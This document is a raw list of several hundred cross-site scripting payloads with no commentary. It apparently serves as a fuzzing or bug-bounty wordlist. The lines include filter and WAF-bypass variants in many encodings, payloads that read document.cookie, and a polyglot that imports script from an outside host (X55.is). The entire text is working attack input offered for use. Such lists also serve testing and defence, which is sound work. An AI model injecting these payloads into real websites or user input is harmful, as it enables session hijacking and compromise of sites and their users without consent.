%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
')}, 1000);alert("xss");//
1'"();<test><ScRiPt>window.alert("XSS_WAF_BYPASS")</ScRiPt>
1'"();<test><iframe onload="window.alert('XSS_WAF_BYPASS')"></iframe>
<body onload="window.alert('XSS_WAF_BYPASS')">
<link rel="stylesheet" href="#" onload="window.alert('XSS_WAF_BYPASS')">
1'"();<test><ScRiPt>alert("XSS_WAF_BYPASS")</ScRiPt>
"><img src=x onerror=prompt(document['domain']);>.asp
"><img src=x onerror=prompt(document['domain']);>.aspx
"><img src=x onerror=prompt(document['domain']);>.php
"><img src=x onerror=prompt(document['domain']);>.html
"><img src=x onerror=prompt(document['domain']);>.htm
"><svg onload=prompt(document.domain);>.asp
"><svg onload=prompt(document.domain);>.aspx
"><svg onload=prompt(document.domain);>.php
"><svg onload=prompt(document.domain);>.html
<!--><svg onload=alert(1)-->.asp
<!--><svg onload=alert(1)-->.aspx
<!--><svg onload=alert(1)-->.php
<!--><svg onload=alert(1)-->.html
"><img src=x onerror=prompt('document.domain');>.asp
"><img src=x onerror=prompt('document.domain');>.aspx
"><img src=x onerror=prompt('document.domain');>.php
"><img src=x onerror=prompt('document.domain');>.html
"><img src=x onerror=prompt('document.domain');>.htm
<script>alert(1)</script>.asp
<script>alert(1)</script>.aspx
<script>alert(1)</script>.php
<script>alert(1)</script>.html
<script>alert(1)</script>.htm
<ScRiPt>alert(1)</ScRiPt>
<s%00c%00r%00i%00p%00t>alert(1)</script>
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
<img src="x" onerror="alert(1)">
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
%3cscript%3ealert(1)%3c/script%3e
&#60;svg/onload=alert(1)&#62;
&#60;script&#62;alert(1)&#60;/script&#62;
--><svg onload=alert(1)>
aaaaa\”-confirm`1`//
\”-confirm`1`//
%3C%2Fscript%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E
";}(document.writeln(decodeURI(location.hash))-"#<iframe src=javascript:alert(document.domain)
javascript://%250Aalert(1)
mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
"><track/onerror='confirm`1`'>
<a href="javascript:alert(1)">a</a>
<iframe src="javascript:alert(1)"></iframe>
eval('alert(1)');
\u0061\u006c\u0065\u0072\u0074(1)
<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
'"><script>alert(2);</script>
%3E'><script>alert(2);</script>
%22-[9].every(alert)-%22//
%22%3E'><script>alert(2);</script>
%E2%80%9C%3E%3CSvG%2Fonload%3Dalert%28document.domain%29%3E
%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
%27%3E'><script>alert(2);</script>
%22%27%3E'><script>alert(2);</script>
'> <script>alert(2);</script>
'>'><SCript>alert(2);</script>
%27%3E%27%3E%22%3E%script%3Ealert(2);%3C/script%3E
'>👽💻🔥<script>alert(2);</script>
'>'+'><script>alert(2);</script>
&#62;'&gt;"<script>alert(2);</script>
'&#x3E;'>"><script>alert(2);</script>
<img src=x onerror=alert('from\u0020subcat\u0020title')>
"><img src=a onerror=alert(document.location)>
"><svg/onload=prompt('Supakiad-S. (m3ez)', document.domain)>
"><A%20%252F=""Href=%20JavaScript:k='%22',top[k+'lert']('XSS')">
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
'\u003E'\u0022><script>alert(2);</script>
'>'\n><script>alert(2);</script>
'&#x3E;'><script>alert(2);</script>
'>&lt;/b&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;b&gt;&lt;!--
'><!--"/><style>@import 'data:text/css;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKSk=';</style><b><!--
'>&lt;/b&gt;%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cb&gt;&lt;!--
'\u003e\'</b><script>alert(document.cookie)</script><b><!--'
'+ '</b><script>alert(document.cookie)</script><b><!--'
(function(){alert(document.cookie)})();
"alert(document.cookie)['script'](2);"
'});alert(document.cookie);//'
'><scr'+'ipt>alert(document.cookie)</scr'+'ipt><b><!--
');alert(document.cookie)();//
'\u0029\u0028};alert(document.cookie);//"
"><svg/onload=alert(1);>
"><iframe onload=alert(1);>
"><audio onplay=alert(1);>
"><img src="javascript:alert(1);" />
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E
%22%2525%2F%28%29%2C%20alert%281%29%3B%27%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E%3Cscript%3E
%3C%25%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
%2522%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
"><img src=x onerror=prompt(document.domain);<<
"><img src=x onerror=prompt(document['domain']);>
"><img src=x onerror=this.innerHTML=''><script>alert(document.domain)</script>">
"><img src=x onerror=eval('prompt(document.domain)')>
"><img src=x id="img"> <script>document.getElementById('img').addEventListener('error', function(){prompt(document.domain);})</script>
"><img src=x onerror=prompt(document.domain);>
"><img src=x><img src= onerror=prompt(document.domain);>
PHNjcmlwdD5pbWcgc3JjPXggb25lcnJvci5wcm9tb3RlKHRy
&quot;&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
%253C%2531%2533%2533%253E%253C%2539%253E%253C%2569%253D%2538%253B%253E%253C%253F%256A%2532%253E%253C%252F%2563%253E%253C%252F%2573%2563%2568%2572%2569%2570%2574%253E
&lt;&lt;img src=x onerror=prompt(document)&gt;&gt;;
"><img\ src=x\ onerror=prompt(document.domain);>
"><img src=x onerror="prompt(document.domain);">
"><img src=x onerror=prompt(document&#46;domain);>
"><img src=x onerror=prompt(document%2Edomain);>
"><img src=x onerror=prompt(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110));>
"><img src=x onerror=prompt(unescape('document%2Edomain'));>
"><svg onload=prompt(document.domain);>
"><img src=x onerror=prompt(document.domain); title=x>
"><div style="background-image: url(x)" onerror=prompt(document.domain);>
"><script>var img=document.createElement('img');img.src='x';img.onerror=function(){prompt(document.domain);};document.body.appendChild(img);</script>
<scr'+'ipt>alert(1)</scr'+'ipt>
\<script\>alert(1)\<\/script\>
<script>alert\u00281\u0029</script>
%3Cscript%3Ealert(1)%3C/script%3E
"><IMG SRC=x ONERROR=prompt(document.domain);>
"><img src=/x onerror=prompt(document.domain);>
"><img src="x" onerror="prompt(document.domain);">
"><img src='x' onerror='prompt(document.domain);'>
"><img src=x onerror=(prompt(document.domain));>
"><img src=x onerror=prompt(document.domain);>
"><img src=x&#9;onerror=prompt(document.domain);>
"><img src=x onerror=prompt('document.domain');>
"><img src=x id=img> <script>document.getElementById('img').addEventListener('error',function(){prompt(document.domain);})</script>
"><img src=x style=content:'x' onerror=prompt(document.domain);>
"><img src=data:, onerror=prompt(document.domain);>
"><img src=x alt=x onerror=prompt(document.domain);>
%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E
%22%3E%3Cimg%09src%3Dx%09onerror%3Dprompt(document.domain);%3E
"><img src=x ONERROR=prompt(document.domain);>
"><img src=x onmouseover=prompt(\u0064ocument.domain);>
"><link rel="stylesheet" href="style.css"><img src=x onerror=prompt(document.domain);>
"><svg><img src=x onerror=prompt(document.domain);></svg>
'--><img src=x onerror=prompt(document.domain);><!--
"><img/src/onerror=alert(`ibro`)>
"<div style="background-image: url(x)" onerror=prompt(document.domain);>
\"><img src=x onerror=prompt(document.domain);>
"><img src:x onerror=prompt(document.domain);>
"><img src=x\%28\%29\ onerror=prompt(document.domain);>
">&lt;img src=x onerror=prompt(document.domain);&gt;
"%3E<img src=x onerror=prompt(document.domain);%3E"
"><img src=x onerror=prompt(document.domain);String.fromCharCode(62);">
">\<img src=x onerror=prompt(document.domain);\>\;\>\<\>"
%0d%0a%0d%0a<script>alert(document.domain)</script>
>'>"><script>alert();</script>
>'>"><svg/onload=alert(document.domain)>
javascript:alert(1);/////
"><img src=x onerror='alert(document.domain)'>
'"/><img src= x onerror='alert(document.domain)'>
'"/><img src= x onerror=prompt(/xss/)>
<img src='test' onmouseover='alert(2)'>
/><script>window.alert('XSS Vulnerable');</script>
#<script>alert(document.domain)</script>
</style></script><script>alert("XSS")</script>
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7
<ScRipt>ALeRt("hi");</sCRipT>
"};alert(23);a={"a":
#<><img src=1 onerror=alert(1)>
"></select><img%20src=1%20onerror=alert(1)>
{{$on.constructor('alert(1)')()}}
\"-alert(1)}//
eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCdYU1MgUE9DIGJ5IERFREknKTwvc2NyaXB0PiJ9
><sVg%2Fonload%3Dalert%281%29+class%3Dikhsan>
q="><img/src/onerror=.1|alert`` class=d>
search?q=javascript:alert(document.domain)
#javascript:alert(document.domain)
<><img src=1 onerror=alert(1)>
<img src=1 onerror=print()>
%27x%27onclick=%27alert(1)
</script><script>alert(1)</script>
"><sVg%2fonload%3dalert%2ebind%28%29%281%29%20class%3dRahul-Dh>
“><img only src=1 onerror=alert()>
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;
<img+src%3dOnXSS+OnError%3dalert('XSs-Cloudflare-bypass-By-Dedi')>
<Img Src=OnXSS OnError=prompt(document.cookie)>
</script><svg/pnload=prompt(1)>
<sCript>confirm()</sCript>
"><SVG ONLOAD=&#97&#108&#101&#114&#116(&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x64&#x6f&#x6d&#x61&#x69&#x6e)>
%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e
<img src=x onerror=prompt()>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is/.source))}//\76-->
javascript:var{a:onerror}={a:alert};throw%20document.domain
<svg onload=alert(1)//
java%0d%0ascript%0d%0a:alert(document.domain);//
&lt;img src=x onerror=alert()>
\'-alert(1)//
#\'-alert(1)//
-alert(1)-&apos;
' onerror='alert("xss")'>
<img src="invalid-image" onerror="alert('XSS');">
#<img src="invalid-image" onerror="alert('XSS');">
<img src=x onerror="prompt(1)">aaaaaaaaaaaa
/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa
</script><svg/onload=alert(0)>
"><body/oNpagEshoW=(confirm)(document.domain)>
"<IMG DYNSRC=\"javascript:alert('XSS');\">"
secbreake@gmail.com\u003C/script\u003E\u003Cscript\u003Ealert(document.domain)//
test<i>test</i><a onmouseover="alert(document.cookie)">
//j\\javascript:alert(document.domain)
<p><img/src/onerror=alert(`ibro`)></p>
('+'alert(1)+')();
.alert(1);
'></script><svg/onload=alert(document.cookie)>
//j%5c%5cjavascript%3aalert(document.domain)
javascript:(alert('XSS Success!'))()
#javascript:(alert('XSS Success!'))()
#"><svg onload=alert(1)>
%3Cimg%20src%3D1%20onerror%3Dalert%281%29%3E
嘼img src=1 onerror=alert(1)嘾
嘾嘾<script>alert(2);</script>
嘼svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
嘼"><svg onload=prompt(document.domain);>
%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
"><u>XSS</u><marquee+onstart='alert(document.cookie)'>XSS
{{window['eval'](window['atob'](window['decodeURIComponent']('Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy')))}}
data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
///%01javascript:alert(document.cookie)/
javascript:alert(document.domain);
xss"</sc"ript><sv"g/onloa"d=aler"t"(document.doma"in)>
0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>
0xd3adc0de&lt;ScRiPt&gt;alert('XSS Success!')&lt;/sCripT&gt;
</b><script>alert(document.cookie)</script><b><!--
</title><script>alert(document.domain)</script>
ryp3i"accesskey="x"onclick="alert(1)"//opk15
#<ScRiPt>alert(1)</ScRiPt>#
"'><svg/onload=confirm(666)>
#"'><svg/onload=confirm(666)>
'x'%20onclick='confirm`1`'
'confirm(document.domain)'>
#'confirm(document.domain)'>
#</script><script>alert(1)</script>
;</script><embed/test='asdf'/sr%00c='/'>
"><svg onmouseover="confirm&#0000000040document.domain)
${alert(1)}
d1bvs%3c%2fscript%3e%3cscript%3ealert(`XSS`)%3c%2fscript%3ec579g
d1bvs</script><script>alert(`XSS`)</script>c579g
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
https://me6.com/aem/xss2.svg
<Img Src=OnXSS OnError=confirm(1)>
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
<svg></p><style><g title="</style><img src onerror=alert(document.domain)>">
"/>"/><img src=xss onerror=alert(2)>
/><svg src=x onload=confirm(document.domain);>
</h1><script>alert(1)</script><h1>
</script><body/onload=alert(m3ez)>
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
"onmouseover="alert(document.cookie)"><!--
<script>alert(1234)</script>
<script>prompt(1234)</script>
<ScripT>alert(1234)</ScRipT>
/<script>alert(1234)</script>
#/<script>alert(1234)</script>
<IMG+DYNSRC="javascript:alert(1);">
<IMG+LOWSRC="javascript:alert(1);">
<isindex+type=image+src=1+onerror=alert(1)>
<meta style="xss:expression(open(alert(1)))" />
<!</textarea <body onload='alert(1)'>
<img+<iframe ="1" onerror="alert(1)">
<base+href="javascript:alert(1);//">
<bgsound+src="javascript:alert(1);">
<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">
<object+data="javascript:alert(0)">
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1
%3E%3Cbody%20onload=javascript:alert(1)%3E
'">><marquee><h1>1</h1></marquee>
</br style=a:expression(alert(1))>
<font style='color:expression(alert(1))'>
<embed src="data:image/svg+xml;>
"/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
<object><param name="src" value="javascript:alert(0)"></param></object>
<isindex action=javascript:alert(1) type=image>
<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>
</a onmousemove="alert(1)">
'%26%26'javascript:alert%25281%2529//
<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>
12&<script>alert(123)</script>=123
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src=/ onerror=alert(1)>
<img/src="xss.png"alt="xss">
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
<scr<script>ipt>alert('XSS')</scr</script>ipt>
foo%00<script>alert(document.cookie)</script>
x"><svg%0Donload="window['alert'](document.cookie)">
x'><svg%0Donload='window["alert"](document.cookie)'>
x"><svg%0Donload="window['alert'](document['cookie'])">
x"><svg%0Donload="window['alert']((document)['cookie'])">
x\"><svg%0Donload=\"window[\'alert\']((document)[\'cookie\'])\">
x"><svg%0Donload=`window['alert']((document)['cookie'])`>
x"><svg%0Donload=`window["alert"](((document)['cookie']))`>
"><<script>alert(document.cookie);//<</script>
><s"%2b"cript>alert(document.cookie)</s"%2B"cript>
#%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
<script>alert(['X','S','S'].join(''))</script>
3Cscript%3Ealert(1)%3C%2Fscript%3E
%253Cscript%253Ealert(1)%253C/script%253E
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
#%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%BCscript%BEalert(%A21%A2)%BC/script%BE
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
<svg onload=alert&#0000000040document.cookie)>
";(a=alert,b=1,a(b))
"<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >"
x"><svg%0Donload="window['alert'](document['cookie'])"
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<object+data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
<a+href="javas&#99;ript&#35;alert(1);">
<IMG+SRC=j&#X41vascript:alert(1)>
<IMG+SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#39;&#41;>
<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000039&#0000041>
%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
<INPUT+TYPE="checkbox"+onDblClick=confirm(XSS)>
alert(String.fromCharCode(88))</SCRIPT>
&lt;script&gt;prompt(&apos;1&apos;)&lt;/script&gt;
&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x78;&#x73;&#x73;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;
&#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x47;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;
=<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>
"+style%3d"x%3aexpression(alert(1))+
\";alert(1);//
#\";alert(1);//
<img src="x:%90" title="onerror=alert(1)//">
"+onkeypress="prompt(23)"+
"+onfocus="prompt(1)"+
alert(document['cookie'])
#alert(document['cookie'])
with(document)alert(cookie)
";location=location.hash)//#0={};alert(0)
";alert(String.fromCharCode(88,83,83))
"+onDblClick=prompt(123)"+
"+onError=prompt(123)"+
";eval(unescape(location))//#%0Aprompt(0)
%'});%0aalert(1);%20//
<IMG+SRC="jav&#x0A;ascript:alert(1);">
<IMG+SRC="jav#x0D;ascript:alert(1);">
"jav&#x09;ascript:alert(1);">
#"jav&#x09;ascript:alert(1);">
%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E
<script%00>alert(1)</script%00>
<scr%00ipt>prompt(1)</sc%00ript>
%3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E
%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E
<*script>prompt(123)<*/script>
<script%20TEST>alert(1)</script%20TESTTEST>
<<SCRIPT>alert(1);//<</SCRIPT>
<script>a\u006cert(1);</script>
<script>eval(a\u006cert(1));</script>
<script>eval(a\x6cert(1));</script>
<script>eval(a\154ert(1));</script>
<script>eval(a\l\ert\(1\));</script>
<script>eval(al+ert(1));</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41));</script>
<script>eval(atob(amF2YXNjcmlwdDphbGVydCgxKQ));</script>
<script>alert(1).replace(/.+/,eval)</script>
<script>function::[alert](1)</script>
<script>alert(document[cookie])</script>
<script>with(document)alert(cookie)</script>
<script><script>alert(1)</script>
<scr<script>ipt>alert(1)</script>
<scr<object>ipt>alert(1)</script>
</script><script>alert(1)</script>
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">
\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e
%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e
javascript:eval(unescape(location.href))
1&"><script>alert(1)</script>=1
#1&"><script>alert(1)</script>=1
</scr</script>ipt><ifr<iframeame/onload=prompt()>whs
<script>alert(“xss”)</script>
<img src=x onerror=alert(“falcon”)>
<script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<body onload=alert(“bingo”)>
#<body onload=alert(“bingo”)>
<Script>alert()</Script>
<svg/onload=alert(“Hacked”)>
#<svg/onload=alert(“Hacked”)>
&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
<img src=x onerror=alert(123) />
<svg><script>123<1>alert(123)</script>
"><script>alert(123)</script>
'><script>alert(123)</script>
><script>alert(123)</script>
</script><script>alert(123)</script>
< / script >< script >alert(123)< / script >
onfocus=JaVaSCript:alert(123) autofocus
"onfocus=JaVaSCript:alert(123) autofocus
scriptalert(123)/script
%20<script>alert(1)</script>
%E5%98%8D%E5%98%8A%20<script>alert(1)</script>
%0d%0a%20<script>alert(1)</script>
%3F%20<script>alert(1)</script>
%20"><svg onload=alert(1)>
%E5%98%8D%E5%98%8A%20"><svg onload=alert(1)>
%0d%0a%20"><svg onload=alert(1)>
%3F%20"><svg onload=alert(1)>
%20<img src=1 onerror=alert(1)>
%E5%98%8D%E5%98%8A%20<img src=1 onerror=alert(1)>
%0d%0a%20<img src=1 onerror=alert(1)>
%3F%20<img src=1 onerror=alert(1)>
%20javascript:alert(1)
%E5%98%8D%E5%98%8A%20javascript:alert(1)
%0d%0a%20javascript:alert(1)
%3F%20javascript:alert(1)
%20"><img src=q onerror=alert(1)>
%E5%98%8D%E5%98%8A%20"><img src=q onerror=alert(1)>
%0d%0a%20"><img src=q onerror=alert(1)>
%3F%20"><img src=q onerror=alert(1)>
%20"><img src=x onerror=prompt(document.domain);>
%E5%98%8D%E5%98%8A%20"><img src=x onerror=prompt(document.domain);>
%0d%0a%20"><img src=x onerror=prompt(document.domain);>
%3F%20"><img src=x onerror=prompt(document.domain);>
%20<script>prompt(document.domain)</script>
%E5%98%8D%E5%98%8A%20<script>prompt(document.domain)</script>
%0d%0a%20<script>prompt(document.domain)</script>
%3F%20<script>prompt(document.domain)</script>
%20<img/src/onerror=alert(ibro`)>
%E5%98%8D%E5%98%8A%20<img/src/onerror=alert(ibro`)>
%0d%0a%20<img/src/onerror=alert(ibro`)>
%3F%20<img/src/onerror=alert(ibro`)>
%20<body onload=alert("bingo")>
%E5%98%8D%E5%98%8A%20<body onload=alert("bingo")>
%0d%0a%20<body onload=alert("bingo")>
%3F%20<body onload=alert("bingo")>
%20%3Cimg%20src=1%20onerror=alert(1)%3E
<sc<script>ript>alert(123)</sc</script>ript>
--><script>alert(123)</script>
";alert(123);t="
';alert(123);t='
#';alert(123);t='
JavaSCript:alert(123)
;alert(123);
src=JaVaSCript:prompt(132)
"><script>alert(123);</script x="
'><script>alert(123);</script x='
><script>alert(123);</script x=
" autofocus onkeyup="javascript:alert(123)
<script\x20type="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
<img \x00src=x onerror="alert(1)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<img src onerror /" '"= alt=javascript:alert(1)//">
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script-->
<!--xss"><img src=x onerror=alert(1)>-->
<!--[if<img src=x onerror=javascript:alert(1)//]>-->
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG onmouseover="alert('xxs')">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<body language=vbs onload=confirm-1
"<body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>"
"\"><body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>",
<button autofocus onfocus=confirm(2)>
'`"><*chr*script>log(*num*)</script>
"><img src="/" =_=" title="onerror='prompt(1)'">
<img language=vbs src=<b onerror=confirm#1/1#>
"]<img src=1 onerror=confirm(1)>
#"]<img src=1 onerror=confirm(1)>
/#<img src=1 onerror=javascript:confirm(3)>
"><img src=javascript:while([{}]);>
<img/ src//'onerror/''/=confirm(1)//'>
"\"><img src=\"x\" onerror=\"confirm(0)\"/>",
<img src=x onerror=URL='javascript:confirm(1)'>
#<img src=x onerror=URL='javascript:confirm(1)'>
"><img src=x onerror=prompt(1);>
"><img src=x onerror=confirm('x') />]
"><img src=x onerror=prompt(document.cookie);>
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
#%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dprompt%2528document.cookie%2529%253B%253E
Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7Pg==
<img src=xx: onerror=confirm(document.location)>
<--`<img/src=` onerror=confirm(1)> --!>
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
><imgsrc=x onerror=confirm.onerror=confirm(1)>
"><input value=<><iframe/src=javascript:confirm(1)
</plaintext\></|\><plaintext/onmouseover=prompt(1)
"<script>1-confirm(0);</script>"/>
"/><script>+-+-1-+-+confirm(1)</script>
<script>(0)['constructor']['constructor']("\141\154\145\162\164(1)")();</script>
<script>+-+-1-+-+confirm(1)</script>
"<script>'confirm(0)%3B<%2Fscript>"
"\"><script>'confirm(0)%3B<%2Fscript>",
<script>'confirm(0)%3B<%2Fscript>
"'`><script>log*chr*(*num*)</script>
</script><svg onload='-/"/-confirm(1)//'"
<script>x=""-prompt(9)-"";y=42;</script>
<svg id=1 onload=confirm(1)>
#<svg id=1 onload=confirm(1)>
<svg onload=confirm(1)
"><svg onload="confirm(7)">
<svg onload="confirm(7)">
<svg onload=eval(URL)>
<svg onload=eval(document.cookie)>
<svg onload=eval(window.name)>
\x3Cscript>javascript:alert(1)</script>
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"`'><script>\x09javascript:alert(1)</script>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<IMG SRC="('XSS')"
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
Set.constructor`alert\x28document.domain\x29
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
